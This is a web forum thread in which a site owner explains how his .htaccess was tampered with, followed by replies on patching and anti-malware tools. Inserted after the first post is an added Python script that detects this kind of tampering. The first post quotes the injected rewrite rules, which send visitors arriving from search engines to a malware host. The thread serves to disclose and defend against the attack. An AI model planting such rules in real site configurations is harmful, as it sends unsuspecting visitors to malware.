
Thread: Hacked Websites

  1. #1
    Join Date
    Jan 2010
    Location
    Reno, NV
    Posts
    131

    Hacked Websites

    Hello Everyone,

    An incident occurred which turned out to be a learning experience and has prompted me to write about it here in the forums.

    A few months ago, my website was hacked and mildly defaced. I discovered it within a few hours, and it took all of about 30 seconds to upload the backup I kept; however, it wasn't until yesterday that I discovered what else had changed. My .htaccess file had been altered. In fact, because this file had been altered, my site was able to be used to redirect others to upload and install malware undetected.

    Now, for those that have gone to my site from any links I have provided in forums or directly, you were safe. However, if someone was looking for images in Google and had gone to my site from searching the images, or through AOL or MSN, let's hope their anti-virus programs were up to date. When I tested the redirected link, my anti-virus (I use Avast) went off, warning me and blocking the site. Let me explain...

    .htaccess is a configuration file for use on web servers running the Apache Web Server software. When a .htaccess file is placed in a directory which is in turn 'loaded via the Apache Web Server', then the .htaccess file is detected and executed by the Apache Web Server software. These .htaccess files can be used to alter the configuration of the Apache Web Server software to enable/disable additional functionality and features that the Apache Web Server software has to offer. These facilities include basic redirect functionality, for instance if a 404 file not found error occurs, or more advanced functions such as content password protection or image hot link prevention. More about the .htaccess file can be found at http://www.javascriptkit.com/howto/htaccess.shtml

    Before my site had been hacked, my .htaccess file had read only:

    <IfModule mod_php5.c>
    # mod_suPHP is active - php.ini overrides must be within these tags or in your local php.ini
    # To set a recursive php.ini, add the following line to the top of this file:
    # SuPHP_ConfigPath /home/yourusername/foldercontainingphp.ini


    </IfModule>


    After the hack these lines were added to the file:

    #Options All
    #AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm
    #RewriteEngine On
    #RewriteOptions inherit
    #RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    #RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    #RewriteRule .* <snip> search-box.in/in.cgi?4&parameter=u [R,L]

    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>

    The top set of lines redirects users coming to the site from the above search engines to the address on the last line. This might also explain why I was not showing up in the Yahoo search engine.

    I have snipped out the HTTP reference from the #RewriteRule to prevent it from becoming a link in this message, as it contains malware.

    In the last set of lines, the line <Files 403.shtml> indicates the page denied users are directed to (403 - Forbidden).

    The next section, "order allow,deny" followed by "allow from all", indicates that all hosts are allowed access.

    It is unknown how the site became infected; however, research showed that almost 90% of break-ins in 2009 that occurred on Linux-hosted sites were caused by malware installed surreptitiously on people's Windows PCs, stealing the passwords that people used to administer their sites. Or the site could have been compromised via a WordPress exploit. To keep your Linux-hosted website from being broken into, one of the most frequently overlooked precautions that you need to take is to keep your Windows PC free of spyware.

    So what changes did I make to the .htaccess file?

    First I deleted all of the malicious lines redirecting users. Then I changed the next section to read:

    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    This helps prevent anyone from accessing the file.

    I also added some more lines to the file that block bad bots and site rippers, making it harder to harvest email addresses, jack up bandwidth and resources, and steal the code from my site.

    This information can be found at: http://www.javascriptkit.com/howto/htaccess13.shtml

    As malware becomes more aggressive, it's not just going to become harder to keep your PC and websites uninfected. It's also going to become harder for site owners and for hosting company abuse departments to verify that a site has been hacked, as the hacks use more sophisticated techniques to prevent the infection from being discovered. It's a good idea to check your .htaccess file periodically if you have one, and not just back up your site but back up that .htaccess file as well, so you have something to compare it with.
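The post above recommends checking .htaccess periodically and keeping a clean copy to compare against. The following is an added example, not code from the poster or from Apache: a small Python checker that flags the pattern described in the thread (RewriteCond lines keyed on HTTP_REFERER followed by a RewriteRule that redirects to an absolute URL with the R flag), confirms whether a <Files .htaccess> block denies access to the file itself, and lists directive lines that were added relative to a saved known-good copy. The three sample file contents are constructed for the example; the redirect target in the tampered sample is a placeholder, not the real address from the thread. Like Apache, the checker ignores lines starting with `#`, so the commented-out lines quoted in the post would need their leading `#` removed before being scanned.

```python
"""Added example (not from the forum post): check an Apache .htaccess for
referer-gated off-site redirects, verify the file protects itself from direct
download, and diff it against a known-good backup. All sample contents are
constructed; the redirect target is a placeholder."""
import difflib
import hashlib
import re
from typing import Dict, List

# Constructed: the clean file as the poster describes it.
BASELINE = """<IfModule mod_php5.c>
# mod_suPHP is active - php.ini overrides must be within these tags or in your local php.ini
</IfModule>
"""

# Constructed: the same file after tampering, with a placeholder redirect target.
TAMPERED = BASELINE + """
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://redirect-target.invalid/in.cgi?4&parameter=u [R,L]

<Files 403.shtml>
order allow,deny
allow from all
</Files>
"""

# Constructed: the clean file plus the self-protection block from the thread.
HARDENED = BASELINE + """
<Files .htaccess>
order allow,deny
deny from all
</Files>
"""

REFERER_COND = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
# A RewriteRule whose substitution is an absolute URL and whose flags include R (redirect).
EXTERNAL_REDIRECT = re.compile(r"^RewriteRule\s+\S+\s+(https?://\S+)\s*\[[^\]]*\bR\b", re.I)
HTACCESS_FILES = re.compile(r"<Files\s+\.htaccess\s*>(.*?)</Files>", re.I | re.S)


def directives(text: str) -> List[str]:
    """Non-blank, non-comment lines with surrounding whitespace removed."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith("#")]


def find_referer_redirects(text: str) -> List[Dict[str, object]]:
    """Return each RewriteRule that redirects off-site and is gated on HTTP_REFERER."""
    findings: List[Dict[str, object]] = []
    pending: List[str] = []  # referer conditions seen since the last RewriteRule
    for line in directives(text):
        cond = REFERER_COND.match(line)
        if cond:
            pending.append(cond.group(1))
            continue
        rule = EXTERNAL_REDIRECT.match(line)
        if rule and pending:
            findings.append({"target": rule.group(1), "conditions": list(pending)})
        if line.lower().startswith("rewriterule"):
            pending = []  # RewriteCond lines only apply to the next RewriteRule
    return findings


def protects_htaccess(text: str) -> bool:
    """True if a <Files .htaccess> block denies all access (Apache 2.2 or 2.4 syntax)."""
    for block in HTACCESS_FILES.findall(text):
        body = block.lower()
        if "deny from all" in body or "require all denied" in body:
            return True
    return False


def fingerprint(text: str) -> str:
    """SHA-256 of the file contents, for a quick 'changed since backup?' check."""
    return hashlib.sha256(text.encode()).hexdigest()


def added_lines(baseline: str, current: str) -> List[str]:
    """Directive lines present in current but absent from the known-good baseline."""
    diff = difflib.unified_diff(directives(baseline), directives(current), lineterm="", n=0)
    return [ln[1:] for ln in diff if ln.startswith("+") and not ln.startswith("+++")]


if __name__ == "__main__":
    for f in find_referer_redirects(TAMPERED):
        print("referer-gated redirect to", f["target"], "when referer matches", f["conditions"])
    print(".htaccess self-protected (tampered, hardened):",
          protects_htaccess(TAMPERED), protects_htaccess(HARDENED))
    print("changed since backup:", fingerprint(BASELINE) != fingerprint(TAMPERED))
    for ln in added_lines(BASELINE, TAMPERED):
        print("added:", ln)
```

On a real host you would read the live .htaccess and the backed-up copy from disk in place of the constructed strings; the fingerprint gives a cheap cron-friendly "has it changed" signal, and added_lines tells you what to look at when it has. The 2.4 `Require all denied` form is accepted alongside the 2.2 `deny from all` shown in the thread, since either one achieves the same self-protection.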

  2. #2
    Join Date
    Mar 2008
    Location
    Jonesboro
    Posts
    544


    Thank you, Steve, for the information. It just shows how these hackers do not have anything better to do with their skills.

  3. #3
    Join Date
    Jul 2008
    Posts
    629


    Wow, that is great information. I'm going to check out my files.
    Photoshop, Dreamweaver, Illustrator, After Effects Tutorials at Youtube | Website | Twitter
    Do you take great photos? Consider selling them at Dreamstime or Shutterstock.
    YouTube Partnership with Makerstudios: http://awe.sm/bDxZW

  4. #4
    Join Date
    Jul 2007
    Location
    Canada
    Posts
    5,209


    One thing we can all learn from this is to protect both your web site and your local systems. It is interesting how malware on your local system can end up doing so much damage to your web site.

    Always have malware protection installed on your computer, and perform regular scans to ensure your computer is clean.

  5. #5


    Thanks. This is really good to know.
    meloncholy - A state of mind brought about by eating too much soft fruit

    I make web things. Sometimes pretty ones.

  6. #6
    Join Date
    Jan 2010
    Location
    Reno, NV
    Posts
    131


    One more thing that I failed to mention: ALWAYS make sure your applications have the latest security patches. I use Dreamweaver to edit my website, and while I never did find any malware on my computer at the time, Adobe did have a series of breaches in their software applications that they patched, and I'm pretty sure that is how the hack occurred, as it happened during that period of time. Upon discovery of the hack, I of course immediately changed the password to the account. Once the patch was applied, the password was changed again.

    Also, as a matter of security, the password gets changed monthly.

  7. #7
    Join Date
    Jul 2007
    Location
    Canada
    Posts
    5,209


    Talking about Adobe's software patches brought up something that I installed on my machine last night. I installed Secunia's PSI tool (http://secunia.com/vulnerability_scanning/personal). This tool scans my machine and looks for applications that aren't patched, are at end-of-life, or are insecure, to help me determine what applications I need to update. Very useful. Secunia also maintains a huge database of applications and displays information about any vulnerabilities that exist for them, such as with web browsers.

    Quite useful to keep on top of application issues.
